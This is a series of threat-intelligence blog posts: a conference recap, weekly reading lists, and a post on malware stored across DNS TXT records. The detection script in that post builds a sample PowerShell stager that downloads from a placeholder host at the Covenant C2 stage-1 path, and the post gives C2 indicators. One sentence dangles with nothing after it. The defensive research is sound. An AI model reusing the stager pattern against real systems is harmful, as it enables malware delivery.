Or perhaps that I just need more sleep this year.

--------

Folks often pose the question: “Which is better, Black Hat or DEF CON?”

The real answer is, “It depends.” 

Black Hat starts the week out with everyone fresh and wide-eyed, staring down the barrel of at least six days of scrambling if they attend both conferences. It is to my benefit that we take care of the business end first before the social and sensory overwhelm hits - I’m much more articulate and sociable, moving mountains to meet practitioners, collaborators, and customers. Discussions are more hard-nosed, shorter, and more focused. Metrics rule the day.

That being said, Black Hat is a delight of a different sort. It’s a much more focused and organized entity rather than creeping chaos. Meeting up with other practitioners and talking shop involves a lot less small talk, with a substantial chunk of theory discussion and an even larger space held to talk practice. 

Plus, less bare concrete. 

One highlight of my Black Hat arrived early; my first briefing was From Prompts to Pwns: Exploiting and Securing AI Agents, presented by NVIDIA AI Red Teamers Rebecca Lynch and Rich Harang. Lynch and Harang began by providing an excellent technical foundation. Points included LLM compromise as enabled by a “universal anti-pattern” that allows for the attacks, as well as agentic autonomy classifications and their relation to both systems architecture and the introduction of nondeterminism into the system. They then pivoted to the practical nature of their red teaming and the realities that informed it. LLM guardrails are mostly just other LLMs performing checks, and so subject to similar attacks. And since these platforms are often crawling the web, the ability to introduce untrusted content spans the entire Internet. Specific technical observables included Cursor rules files, ASCII smuggling, and more. And the idea that malicious actors can more effectively use LLMs to socially engineer the user than other technologies was a brilliant insight.

The talk was equal parts funny and grim, and I’m now hungry to see more from NVIDIA’s AI Red Team.

Another highlight came from the venerable Threat Intel team at Infoblox, No Hoodies Here: Organized Crime in AdTech. The talk revolved around long-term and fascinating research into the spam & scam cybercriminals VexTrio, accompanied by the second post in Infoblox’s blog series on the group (you can find the first post here). Their research laid bare the evolution of VexTrio into an adtech powerhouse of villainy, complete with Instagram photos of their fast cars, lavish meals, and expensive boats. A deep understanding of both the technologies involved and the human behavior behind them emerged through excellent research and storytelling.

--------

DEF CON is, of course, an entirely different animal. It’s about one-tenth the price, and I’d guess at least twice the size of Black Hat. And the chaos only ends where the concrete does too (that’s not hyperbole by the way, the floors are all concrete, bring good shoes and ibuprofen).

Now that DEF CON has moved to a single venue it’s become a little more manageable, and staff learned the ins and outs of the new complex last year and applied those lessons to great effect. Attendance is much wider spread than Black Hat, with enthusiasts and other kinds of technologists in attendance. 

There’s more swagger, but there’s also more joy; folks assembling under an umbrella of energetic curiosity and irreverence and self-organizing across a number of villages as well as the main stage talks. 

We were able, and honored, to show up at DEF CON 33 in a big way, with three separate talks in three separate villages. 

DNS Scavenger Hunt
Security Advisor Malachi Walker gave an interactive talk at the Blacks in Cyber Village: Following Threat Actors’ Rhythm — to Give Them More Blues. The talk provided indicators to follow around threat actor activity and then engaged the crowd in a DNS-based scavenger hunt from the terminal.

Malware in DNS
Malachi Walker and Senior Security Operations Engineer Ian Campbell spoke on investigative findings in the Malware Village: Plain TXT, Malicious Context: Uncovering DNS Malware. Included were DNS investigation basics, and then several real-world examples of DNS TXT records being used for malware storage and retrieval as well as the step-by-step detection specifics. There’s a bonus round at the end of the slide deck for folks interested in domain mysteries!

Pre-Identifying DNS Wildcards: A New Standard of Care
CISO and Head of Investigations Daniel Schwalbe presented original research and enablement at Recon Village. Informed by a DEF CON 31 win at the Subdomain Enumeration Contest, an alternative method that identified 100 times the winning results required a parallel new solution for identifying and removing wildcarded domains.

Of course, other folks were there too. A LOT of them, actually. And many giving great talks on stages or in villages. Yael Grauer in the Crypto and Privacy Village on Cyber Defenses, cooperq and oopsbagel in the hackers.town community on Rayhunter Internals, and our friend Jon DiMaggio co-speaking with Jon Fokker on the Track 5 stage spilling the tea about a REvil actor, to name just a few. The latter was a fantastic talk that showed the deep and inextricable connection between ransomware observables, human behavior, and group dynamics with substantial realness. 

Summer in Las Vegas is always hot, and uncomfortable, and packed with people. But at the same time, filled to the brim with joy and curiosity, serious business alongside frenetic nerdery. Different but often parallel strains of justice running through many diverse communities celebrating their uniqueness and their shared loves and interests simultaneously. 

I don’t know of another week like it anywhere, and I wouldn’t have it any other way.

(except for maybe the concrete floors.)

Join our teams as they share their DEF CON talks on Tuesday, September 30: https://www.domaintools.com/defcon-session-recap-customer-webinar/

Cybersecurity Reading List - Week of 2025-07-28

Commentary followed by links to cybersecurity articles that caught our interest internally.

It is a lovely day in information security,

and you are a horrible goose.

(Collected from IRC, original source unknown. Reach out if you know.)

We’re a week away from Hacker Summer Camp, and I’m curious: similar to the writers’ conversation about “plotters versus pantsers”, are your shenanigans all lined up in advance, or are your Vegas shenanigans more opportunistic and inspired by the moment? Do you carefully clean and arrange your tools, pack and unpack and repack in advance? Or do you live off the land and a few strips of rusty aluminum stripped from a can of Surge in 1997 and tucked in your wallet ever since?

Unless of course you’re the type of person to avoid shenanigans. Apparently those people exist.

This year’s Hacker Summer Camp includes some steam to vent. We’re charging into the desert amidst a cloud of hot dust and exploited Sharepoint embers, a mass-breach of women’s data after they sought safer dating, a new technology seemingly bent on speedrunning all the lessons computing has learned the hard way, and that’s not even getting into this year’s complexities around domestic agency capabilities. Everything considered, it’s enough to turn to nihilistic partying to cope.

But what I expect to see more of, what I’ve seen from the various clusters assembling for BlackHat, DEF CON, and BSides Las Vegas, is community. It’s our strongest power and our greatest defense. It’s often said that the Internet perceives censorship as damage and routes around it; and there may be drama, there may be dark points, there may be jerks, but community can react to damage the same way. And in many cases, it is.

Find the others. Reach out. Make grand collaborative plans, scale them back, amplify them further. Make room for the quieter voices. And don’t forget to make time to play.

Next week, let’s come to play. 

Podcasts

Lawfare - The Double Black Box: Ashley Deeks on National Security AI - Excellent, thoughtful exploration of ‘the idea that the use of artificial intelligence in the national security space creates a "double black box." The first box is the traditional secrecy surrounding national security activities, and the second, inner box is the inscrutable nature of AI systems themselves, whose decision-making processes can be opaque even to their creators.’ I picked up Deeks’ book immediately after listening to the podcast.

Srsly Risky Biz - Four key players drive Scattered Spider - Some interesting conclusions coming out lately. For instance, incident response investigators cross-referencing incidents attributed to SCATTERED SPIDER keep running across the same voices in voice-delivered social engineering attacks. Also, a few folks playing “Project Manager” roles. 

Articles

Okta - Okta observes v0 AI tool used to build phishing sites - Cheat-sheet style hint here: most Vercel-built sites have telltale DNS records CNAMEing back to vercel[.]com subdomains, and use vercel-dns[.]com nameservers. Maybe start building that into your detections and reassess once Vercel gets a handle on this. Looking at their nameservers for domains first seen July 28, I saw multiple career/application/hiring domains pretending to be from major corporations, several attempts at emulating the customer service platform of a major mobile provider, attempts to emulate adclick revenue and CRM platforms, and more. Just one day’s worth of new AI creations.

Proofpoint - NET RFQ: Request for Quote Scammers Casting Wide Net to Steal Real Goods - Good work by Proofpoint here amidst a fascinating scam leveraging “net-30” type financing to get goods or services, and then vanish. 

Resecurity - Cybercriminals Attack Seychelles – Offshore Banking as a Target - Well. That’s a shame.

The Record - Russian bulletproof hosting service Aeza Group sanctioned by US for ransomware work - Within a few days they started shifting their nameservers, and the primary ASN moved behind another Russia-aligned BGP safewall for its announcements. One of these days I need to dive deeper into technical observations after international sanctions; if you’ve got good examples, please reach out. 

knostic.ai - Exposing the Unseen: Mapping MCP Servers Across the Internet - Knostic (the startup brainchild of Gadi Evron and Sounil Yu) doing some great foundational fact-finding here around how organizations are deploying Anthropic’s Model Context Protocol. Unsurprisingly, the news isn’t good. 

Cisco Talos - Cybercriminal abuse of large language models - General but good roundup on some of the malicious uses seen in the wild. 

Lawfare - AI and Secure Code Generation - I don’t necessarily agree with everything, but Geer and Aitel know their stuff and make some very good points. 

Reuters - China-linked hackers target Taiwan's chip industry with increasing attacks, researchers say 

DTI - Malware in DNS - This was a quick but clever piece by one of our researchers that struck far louder chords than we expected. 

FT - Disinformation warriors are ‘grooming’ chatbots - LLM-grooming is the new cache poisoning, pass it on.

Research Papers and Reports

Censys - 2025 State of the Internet Report 

WEIS - Examining Newly Registered Phishing Domains at Scale 

Tools and Resources

INTERPOL - INTERPOL launches our new external newsletter  

Quad9 - Globe of Wonder - The good folks at Quad9 DNS have open-sourced their visualization tool for mapping realtime events onto a view of the Earth. 

Malware in DNS

Because it's always DNS, we wanted to share this fun finding of malware stored across DNS TXT records.

Recent reports of hiding images in DNS records inspired an exploration for such files in the wild from passively collected DNS records available in DNSDB Scout. Put very simply, files can be partitioned and stored in DNS TXT records. They can then be retrieved via DNS requests and put back together. This also means these files may persist until the DNS server removes the records or overwrites them thereby providing a form of unwitting file or data storage. The initial report detailed the partitioning of image files and converting them to hexadecimal before issuing writes to a domain’s TXT records. For that reason, we began a search at the beginning of DNS RDATA TXT records for magic file bytes in hexadecimal format for a wide range of executables and common file types using regex patterns such as the following:

^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,}))

One of the findings from 2021-2022 was TXT records beginning with the magic sequence for an executable file header.

C83464356139303030303330303030303030343030303030306666666630303030623830303030303030303030303030303430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030306538303030303030306531666261306530306234303963643231623830313463636432313534363836393733323037303732366636373732363136643230363336313665366536663734323036323635

The same .exe header value was seen on 3 different domains, each sharing the same subdomain pattern. 

Digging into one of the domains, “*.felix.stf.whitetreecollective[.]com.”, we see that it has several hundred iterated integer subdomain labels, each with a different TXT RDATA value. This suggested that the .exe file was being fragmented across all the subdomains, with the integer label tracking the correct sequence.

By exporting the JSON of the domain’s TXT records and having a generative AI throw together a script to piece the file back together in the correct order, we were able to observe the SHA256 hashes of the files stored in DNS TXT records:

  • 7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866
  • e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1

Both files appear to be Joke Screenmate malware. These are a form of prank software and may commonly exhibit the following behaviors once run on machines:

  • Simulating destructive actions: The program might display fake error messages, fictitious virus warnings, or animations that mimic the deletion of system files, causing panic for the user.
  • Interfering with user control: Some screenmates are designed to be difficult to close, may multiply on the screen, or actively evade the user's mouse cursor.
  • Displaying unsolicited content: These programs can present a continuous stream of jokes, images, or animations that can be distracting and difficult to stop.
  • System performance issues: Like any running application, they consume system resources, and poorly coded screenmates can lead to system slowdowns or crashes.

A brief review of other TXT records for the 3 domains opened another line of inquiry: malicious commands stored in TXT records. This was seen with multiple TXT records associated with drsmitty[.]com, such as the TXT record of the following subdomain: 15392.484f5fa5d2.dnsm.in.drsmitty[.]com.

The command contains an encoded PowerShell script that acts as a stager and connects to another domain: cspg[.]pw. The URL it requests (/api/v1/nps/payload/stage1) is the default endpoint for a Covenant C2 server to serve its next-stage payload.
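The hunt and reassembly described in this post (the magic-byte regex applied to TXT RDATA, the integer-labelled fragment subdomains, and the encoded PowerShell stager sitting in a TXT record), as an added example that is not the post's generated script. It assumes a simplified DNSDB-style export shape ({rrname, rrtype, rdata}); the example.invalid names, the sample file bytes and the sample stager text are constructed.

```python
"""Triage DNS TXT records for stored files and encoded PowerShell stagers.

Added example, not the post's script. Assumes a simplified DNSDB-style export:
a list of {"rrname": ..., "rrtype": "TXT", "rdata": ['"..."', ...]} records.
"""
import base64
import hashlib
import re

# The post's regex: a TXT RDATA whose quoted string opens with the hex of a file header.
MAGIC_RE = re.compile(
    r'^"((ffd8ffe[0-9a-f].{12,})|(89504e47.{12,})|(47494638[79]61.{8,})|(255044462d.{10,})'
    r'|(504b0304.{12,})|(4d5a.{16,59}|4d5a.{61,})|(7f454c46.{12,})|(c[ef]faedfe.{12,})'
    r'|(1f8b08.{14,})|(377abcaf271c.{8,})|(526172211a07.{8,}))'
)
MAGIC_NAMES = {
    "ffd8ff": "JPEG", "89504e47": "PNG", "47494638": "GIF", "25504446": "PDF",
    "504b0304": "ZIP", "4d5a": "MZ executable", "7f454c46": "ELF",
    "cefaedfe": "Mach-O", "cffaedfe": "Mach-O", "1f8b08": "gzip",
    "377abcaf271c": "7z", "526172211a07": "RAR",
}
LABEL_RE = re.compile(r"^(\d+)\.")  # leading integer subdomain label, e.g. "17.felix..."
ENC_PS_RE = re.compile(r"(?i)powershell(?:\.exe)?\s.*?-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})")
COVENANT_STAGE = "/api/v1/nps/payload/stage1"  # default Covenant stage-1 path (from the post)


def classify_txt(rdata: str):
    """File type suggested by a TXT RDATA string's leading hex, or None if no magic matches."""
    if not MAGIC_RE.match(rdata):
        return None
    body = rdata.strip('"').lower()
    return next((name for magic, name in MAGIC_NAMES.items() if body.startswith(magic)), "unknown")


def reassemble(records, parent):
    """Order the TXT fragments under `parent` by integer label and hex-decode them.

    Returns (bytes, missing_labels); gaps mean an incomplete export, not a corrupt sample.
    """
    fragments = {}
    for rec in records:
        name = rec["rrname"].lower()
        m = LABEL_RE.match(name)
        if rec.get("rrtype") != "TXT" or not name.endswith("." + parent) or not m:
            continue
        # A TXT record may carry several quoted strings; they concatenate in order.
        fragments[int(m.group(1))] = bytes.fromhex("".join(s.strip('"') for s in rec["rdata"]))
    if not fragments:
        return b"", []
    labels = sorted(fragments)
    missing = [i for i in range(labels[0], labels[-1] + 1) if i not in fragments]
    return b"".join(fragments[i] for i in labels), missing


def decode_encoded_powershell(rdata: str):
    """Decoded UTF-16LE script if the record holds `powershell -enc <base64>`, else None."""
    m = ENC_PS_RE.search(rdata.strip('"'))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(records, parent):
    """Defender summary: the stored file (type, sha256, size, gaps) and any stager records."""
    data, missing = reassemble(records, parent)
    stagers = []
    for rec in records:
        for s in rec.get("rdata", []):
            script = decode_encoded_powershell(s)
            if script is not None:
                stagers.append({"rrname": rec["rrname"], "covenant_default_path": COVENANT_STAGE in script})
    return {
        "type": classify_txt('"' + data.hex() + '"') if data else None,
        "sha256": hashlib.sha256(data).hexdigest() if data else None,
        "size": len(data),
        "missing_fragments": missing,
        "stagers": stagers,
    }


# --- constructed sample data (not from the post) ---
PARENT = "felix.stf.example.invalid."
SAMPLE_FILE = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
               + bytes(range(48)) + b"This program cannot be run in DOS mode.\r\n$")


def fragment_to_txt_records(data: bytes, parent: str, chunk: int = 16):
    """Build N.<parent> TXT records holding hex chunks, mirroring the layout the post observed."""
    return [{"rrname": f"{i}.{parent}", "rrtype": "TXT", "rdata": ['"' + data[o:o + chunk].hex() + '"']}
            for i, o in enumerate(range(0, len(data), chunk))]


_STAGER_TEXT = "Invoke-WebRequest -Uri http://stager.example.invalid" + COVENANT_STAGE
SAMPLE_RECORDS = fragment_to_txt_records(SAMPLE_FILE, PARENT) + [{
    "rrname": "15392.0000000000.dnsm.in.example.invalid.", "rrtype": "TXT",
    "rdata": ['"powershell -enc ' + base64.b64encode(_STAGER_TEXT.encode("utf-16-le")).decode() + '"'],
}]

if __name__ == "__main__":
    print(triage(SAMPLE_RECORDS, PARENT))
```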

That the stager script is stored in a DNS TXT record is not by itself enough; some other action would first have to take place on a system to retrieve and execute the script, such as the following:

In summary, in 2021-2022 an actor was using DNS TXT records to store and possibly deliver ScreenMate malware and stagers for likely Covenant C2 malware infections. The same C2 domain was seen in another domain’s TXT record in July 2017, msg1.rickrick.qa.urab[.]org.

Ian Campbell
Cybersecurity Reading List - Week of 2025-06-16

June arrives with more heat, everywhere, and not just regarding the weather.

Law enforcement is counting up some recent disruption and arrest operation wins like Operation RapTor, covered below, or the Lumma takedown, or Operation Endgame (covered here in Srsly Risky Biz). And in the humid biomass of Washington D.C., several hundred finding-hungry investigators, hunters, and defenders gathered last week to attend SLEUTHCON.

SLEUTHCON is a popular, limited-capacity conference in Crystal City themed on financially-motivated actors and crime. The venue and setting are not a sales setup, but rather a place for practitioners to talk turkey between single-track presentations targeted enough to be relevant to most or all attendees. I was a first-timer there this year, and it has immediately become a must-attend conference for me. The relaxed nature, shared purpose, and sense of humor hooked me.

I’d be remiss if I didn’t mention that DomainTools CISO and Head of Investigations Daniel Schwalbe co-spoke with Analyst1 hunter Jon DiMaggio on the complex human realities of the Russian-affiliated ransomware ecosystem, and published a parallel post here. The research challenges our typical approach to and typology of ransomware groups, and argues for the changes necessary in order to better investigate and disrupt them.

On another conference note, looking forward to this BlackHat briefing by Infoblox Threat Intel folks, as they always bring the best tea.

With all that sorted, let’s get sweaty.

Recommended Cybersecurity Podcasts

Team Cymru - Future of Threat Intelligence - 6mins - Frost & Sullivan cybersecurity principal Martin Naydenov on AI in cybersecurity right now. Contains a really interesting insight: because of the (accurate) trust gap, an AI product may differentiate itself in analyst use by providing a path to validate the AI output as accurate, alongside the GenAI output itself. 

Ologies with Alie Ward - Cryptology, with author Simon Singh - Nothing groundbreaking, but thoroughly entertaining. There are few things more fun than listening to someone gush about a topic they’re passionate about, which is more or less the basis of the entire Ologies podcast.

Must-Read Cybersecurity Articles and Blog Posts

Qualys - Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations - Good, brief post from Qualys threat researchers on LockBit insights gleaned from the recent dump. Worth your time.

Proofpoint - The Bitter End: Unraveling Eight Years of Espionage Antics—Part One - Excellent work by Proofpoint and Threatray, and some great passive DNS work in particular, which made digging through the provided IOCs a fun little hyperfocus.

Mandiant - Hello, Operator? A Technical Analysis of Vishing Threats - Good general information, but the point to really note is UNC6040 specifically targeting enterprise Salesforce instances for compromise, exfiltration and extortion.

Intel 471 - Two critical challenges facing CTI teams and how to overcome them: Intel 471’s additional insights into the SANS 2025 CTI Survey - The importance of including geopolitics in CTI, along with how to show the value of CTI programs - important, well-made points.

DomainTools Investigations - Eggs in a Cloudy Basket: Skeleton Spider’s Trusted Cloud Malware Delivery - We cracked, fried, and served up recent FIN6 activity leveraging a social-engineering jobseeker approach to execute phishing and malware delivery operations. IOCs, as always, up on GitHub.

Europol - 270 arrested in global dark web crackdown targeting online drug and criminal networks - “The suspects were identified through coordinated investigations based on intelligence from the takedowns of the dark web marketplaces Nemesis, Tor2Door, Bohemia and Kingdom Markets.” 

KrebsOnSecurity - Proxy Services Feast on Ukraine’s IP Address Exodus - This is particularly grim. A fifth of their IP space is no longer under their control, either seized by Russian-affiliated organizations or held by opaque proxy service providers. Incredibly important to consider as an element of the cyber domain in conflicts going forward.

KrebsOnSecurity - Pakistan Arrests 21 in ‘Heartsender’ Malware Service - Krebs identified major players in 2021 after they infected themselves with their own malware. The wheels may move slowly, but it’s nice to see them move once in a while.

The Record - Major food wholesaler says cyberattack impacting distribution - Following playbooks unleashed in the UK, looks like retail first, grocery second, in current US compromises. Has me kind of wondering if some cluster is treating the UK as proving ground, the US as validating deployment. As Gossi mentioned on Mastodon, deploying shortly before a company is due for an earnings report is also a unique way to apply pressure to pay a ransom.

Natto Thoughts - Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry - Excellent insights and details here that dovetail with some of our internal research. Always worth knowing better the people behind the keyboards.   

SentinelOne - Follow the Smoke | China-nexus Threat Actors Hammer At The Door of Top-Tier Targets - “This research underscores the persistent threat Chinese cyberespionage actors pose to global industries and public sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity vendors.” - You don’t say…

Domain Name Wire - PayPal wants patent for system that scans newly-registered domains - Specifically scanning for typical elements of a shopping checkout system, and then simulating a checkout process in an automated manner. Clever, and probably effective - this is one of the places where AI shines, in that you can train one model in detection, and one model adversarially, and pit them against each other on staggering timescales. Both systems end up providing insight.

Semafor - The hottest new vibe coding startup may be a sitting duck for hackers - Vibe-coded app platform populated a single critical vulnerability into at least 10% of apps it created, allowing anyone to access app usernames, email addresses, financial information, and secret API keys. 

Latest Cybersecurity Research Papers, Reports, and Books

caida - From Scarcity to Opportunity: Examining Abuse of the IPv4 Leasing Market - “We examine leasing market data, leveraging blocklists as an indirect measure of involvement in various forms of network abuse. In February 2025, leased prefixes were 2.89× more likely to be flagged by blocklists compared to non-leased prefixes.” - Spent a little while thinking about this one in the context of the above Krebs article on IPv4 leasing allowing Russia to increasingly isolate and infiltrate Ukrainian IP space.

arXiv - Stop Anthropomorphizing Intermediate Tokens as Reasoning/Thinking Traces! - The dangers of anthropomorphizing generative AI.

Apple Machine Learning Research - The Illusion of Thinking: Understanding the Strengths and Limitations of Reasoning Models via the Lens of Problem Complexity - Included herein, phrases like “complete accuracy collapse beyond certain complexities.” 

Domain Name Wire - ICANN study links low-cost, automated registrations to phishing abuse - In other news, water makes things wet. I’d love to think hard data like this might cause registrars to start doing the right thing, but while I was born at night, it wasn’t last night.

Cybersecurity Reading List - Week of 2025-05-19

May as well. 

No, I really mean it: we have to endure May as well? Oof, buddies, oof.

The horrors persist, but so do the little treats, and the wins that make you dance at your desk. We’ve got a few of those coming at DomainTools Investigations (DTI). But once the dancing is done, we still have to sit back down and do the work; poring through research, grinding through logs, immersing ourselves in countless records, a hundred cases of watching expected connections fall flat only for an unexpected finding to relight that hunter’s spark within.

I hope the rest of you dance at your desks as well. It’s not that I’m worried about looking silly doing it alone, I just don’t want you to miss a good time. And if I can’t dance while hunting through DNS, it’s not my kind of resolution. 

As usual, quotes are in quotation marks, comments by me in italics.

Recommended Cybersecurity Podcasts

Maltego - Human Element - Our friends at Maltego launched a new podcast hosted by CTO Ben April, with the first episode guest being Unit 221B founder James Lance. Ben is one of my favorite people to talk technology with, so I recommend subscribing to Human Element ASAP. Find it wherever you get your podcasts.

This Week in Machine Learning - CTIBench: Evaluating LLMs in Cyber Threat Intelligence with Nidhi Rastogi - Excellent, well-grounded conversation on the advantages and disadvantages of large language models in cyber threat intelligence. All about realistic performance evaluation, no hype.

Must-Read Cybersecurity Articles and Blog Posts

Qualys - Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations - Good, brief post from Qualys threat researchers on LockBit insights gleaned from the recent dump. Worth your time.

Citizen Lab - Uyghur Language Software Hijacked to Deliver Malware - Few orgs have had the kind of impact on world freedom and human rights that Citizen Lab does, and this report does not disappoint. Technical and behavioral indicators are abundant for further hunting.

Cofense - Using Blob URLs to Bypass SEGs and Evade Analysis - The HTTP call is coming from inside the house. Or the computer. Blob URLs are locally generated, circumventing a few different defense techniques, and so are a natural staging point for phishing pages.

Proofpoint - CoGUI Phish Kit Targets Japan with Millions of Messages - Finding it interesting that Japan seems to be getting hit harder than usual right now, especially the financial sector. Great writeup by Proofpoint on the CoGUI campaign.

IC3/FBI - Phishing Domains Associated with LabHost PhaaS Platform Users (PDF link) - domain list CSV - List hasn’t been entirely validated, but there are 42,000 starting points for your next hunt.

NextGov - Salt Typhoon hacks to influence final round of DARPA’s AI-cyber competition - “Kathleen Fisher, director of the Information Innovation Office at DARPA, told Nextgov/FCW at the RSAC Conference in San Francisco, California that DARPA is ‘100% inspired by the Salt Typhoon and Volt Typhoon stories, and needing to make the critical infrastructure software more robust from all those stories.’”

PenTest Partners - Exploiting Copilot AI for Sharepoint - One of those worst-case scenarios for defenders: once you lose control of sensitive enterprise data to an agent, it’s gone for good. Teachable moment for organizations looking to incorporate LLMs at that level.

Blood in the Machine - Four Bad AI Futures Take Root - Grim opinion-ish piece on four generative AI stories that landed last week and appear poised to cause significant collateral damage. Black Mirror imaginations meet Torment Nexus self-awareness.

Latest Cybersecurity Research Papers, Reports, and Books

NCSC - Impact of AI on cyber threat from now to 2027 - “This report builds on NCSC Assessment of near-term impact of AI on cyber threat published in January 2024. It highlights the assessment of the most significant impacts on cyber threat from AI developments between now and 2027. It focuses on the use of AI in cyber intrusion. It does not cover wider threat [sic] enabled by AI, such as influence operations. AI and its application to cyber operations is changing fast. Technical surprise is likely.” - Light reading for your evening. Hoping we see TRADOC’s Mad Scientist Laboratory lean in on a fiction contest around this concept to pull in some more unorthodox possibilities.

Tools and Other Resources

Jellybyte - local LLM-powered threat intelligence lab.

Cybersecurity Reading List - Week of 2025-04-21

The ground softens, the skies pour forth; and now is the time to begin planting our flowers.

We put our CVEs in; we take our CVEs out. We put our CVEs in and shake them all about! The funding is at risk, the funding is dead, the funding is back on track for a year! Watching the forced changes to the national cybersecurity ecosystem happening is extremely concerning, and yet: seeing some of that same ecosystem recognize and route around the damage to plant and nurture new paths forward is exactly what we need.

ChatGPT is now a pinpoint GeoGuessr for $20/mo. 4chan, having not updated its infrastructure since the Obama administration, has reached an inevitable conclusion. NSO Group is trying to make new inroads into mainstream contracts. And seasoned security practitioners who have stood for truth and against disinformation are being directly targeted for harassment. 

We’re going to need a lot more coffee. But also, flowers. Let’s get to brewing, planting, and planning.

Recommended Cybersecurity Podcasts

Cisco Talos - Talos Takes - Year in Review special part 1: vulnerabilities, email threats, and adversary tooling, and Year in Review special part 2: The biggest ransomware trends

Must-Read Cybersecurity Articles and Blog Posts

SpyCloud - Exposed Credentials & Ransomware Operations: Using LLMs to Digest 200K Messages from the Black Basta Chats - Whoever added credential defense advice to the cybercrime gang at the bottom of this post deserves a raise. 

Reuters - Cybersecurity industry falls silent as Trump turns ire on SentinelOne 

Metacurity - CISA pulls MITRE's CVE program back from the brink of death at the 11th hour - Lots of CVE talk this week, naturally. We’ve now got private and ad-hoc informal buddings of new collaborations. The community obviously sees a need for it, if not necessarily in the current form. 

CybersecurityNews - CVE Foundation Launched To Ensure Long-term Vulnerability Tracking - Happened prior to the above, but looks like a smart path to follow. Also see the informal CVE-related Discord server in the “Tools” section. 

NextGov - User with Russian IP address tried to log into NLRB systems following DOGE access, whistleblower says - Minutes after account creation, auth requests from Russia with the correct username and password began. Whistleblower provided technical data to Congress and I’m very, very interested in seeing it. Also, a great lesson in creating and preserving defensive geoblocks.

404 Media - 4chan Is Down Following What Looks to Be a Major Hack Spurred By Meme War - This looks Real Bad. IP info especially. Also looks like 4chan infra hasn’t been updated in more than a decade.

Politico - Pentagon’s ‘SWAT team of nerds’ resigns en masse - “Under pressure from the Elon Musk-led Department of Government Efficiency, nearly all the staff of the Defense Digital Service — the Pentagon’s fast-track tech development arm — are resigning over the coming month, according to the director and three other current members of the office granted anonymity to discuss their job status freely, as well as internal emails.”

Infoblox - Disrupting Fast Flux With Protective DNS - Everything old is new again. I thought Fast Flux was done and dusted, turns out it was but is also the new hotness. Not a huge fan of this retro vibe.

MIT Technology Review - US office that counters foreign disinformation is being eliminated 

Zoom - Incident Report - Including this one mostly for shock value. The April 16 Zoom outage was traced back to miscommunication between MarkMonitor and GoDaddy, causing GoDaddy to issue a domain shutdown for Zoom’s primary operational domain.

Latest Cybersecurity Research Papers, Reports, and Books

arXiv - LLMs are unreliable for cyber threat intelligence - I didn’t see any publication footnotes so I assume it’s a preprint article, but worth reading to scope some of the limitations.

Tools and Other Resources

Discord - Extended Vulnerability Community - pop-up Discord server with a bunch of vulnerability folks who assembled under the looming Mitre CVE defunding, before the extension.

Cybersecurity Reading List - Week of 2025-03-24

The thaw continues here in DomainTools Investigations’ (DTI) satellite office outside Boston, and so does the cyber. Typhoon APT news arrives almost as fast as genAI “content” and we are still trying to decide which is more malicious. The undocumented tools in ESP32 chips are worrying. The Wizoogle deal is back on, Cloudflare continues to Cloudflare, and Patch Tuesday this month required an extra twelve hours on the clock. Luckily, Redmond now controls all clocks, so they just plugged the extra hours in.

It’s Copilot O’Clock. Let’s dive in!

Recommended Cybersecurity Podcasts

To Catch A Thief: China’s Rise to Cyber Supremacy - Brand new on the podcast scene, cyber journo Nicole Perlroth documents Chinese government-related attacks, surveillance, positioning, and more. Episode one also includes Dmitri Alperovitch, who’s very much worth listening to on topics like this. Two episodes up so far, produced by security firm Rubrik.

Data Skeptic - Criminal Networks - Network science as applied to law enforcement and criminal interventions. Really neat episode; worth noting it’s theory-heavy but brings interesting applications into view. PhD Candidate Justin Wang Ngai Yeung looks like one to watch.

Must-Read Cybersecurity Articles and Blog Posts

Trend Micro - Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns

Veriti - OpenAI Under Attack: CVE-2024-27564 Actively Exploited in the Wild - “Attackers are actively targeting OpenAI, exploiting CVE-2024-27564, a Server-Side Request Forgery (SSRF) vulnerability in OpenAI’s ChatGPT infrastructure. Veriti’s latest research reveals that this vulnerability, despite being classified as medium severity, has already been weaponized in real world attacks.” - It’s a good thing we’ve plumbed AI into everything as fast as possible, huh?

SpyCloud - Cybercrime Wins in 2024: Major Takedowns & Arrests - Never forget to celebrate the wins. 

Quarkslab - Beyond the Hook: A Technical Deep Dive into Modern Phishing Methodologies - Not a fan of phishing tests, but this is an excellent breakdown of email phishing techniques and worth reading for all n-teamers, blue, purple, red, and otherwise.

DataBreachToday - UK Official Says Russian Disinfo Blocked in 2024 Election 

Cisco Talos - Unmasking New Persistent Attacks on Japan

Infoblox - Work Hard, Pay Harder - Recruitment scams aren’t new, but this is a great joyride through scammer infrastructure all beginning with a one-word WhatsApp message.

RiskyBiz - China says Taiwan's military is behind PoisonIvy APT - Catalin Cimpanu provides not only a breakdown of the announcement, but some critical context related to this and similar past announcements from the Chinese government, including the increasing lockstep coordination between Chinese public and private sector report releases.

DomainTools Investigations (DTI) - Domain Registrars Powering Russian Disinformation: A Deep Dive into Tactics and Trends - It may seem corny, but confronting disinformation and its enablers makes me fiercely proud to be part of DTI.

Latest Cybersecurity Research Papers, Reports, and Books

SpyCloud - 2025 Identity Exposure Report: Breaking Down the Identity Threat Landscape - “SpyCloud’s total collection of recaptured data grew 22% in the past year, from 43.7 billion to 53.3 billion distinct identity records – representing a growing underground economy that thrives on compromised accounts and exposed credentials.” - Hard to wrap your head around those numbers. Harder to do so without getting nihilistic.

Tools and Other Resources

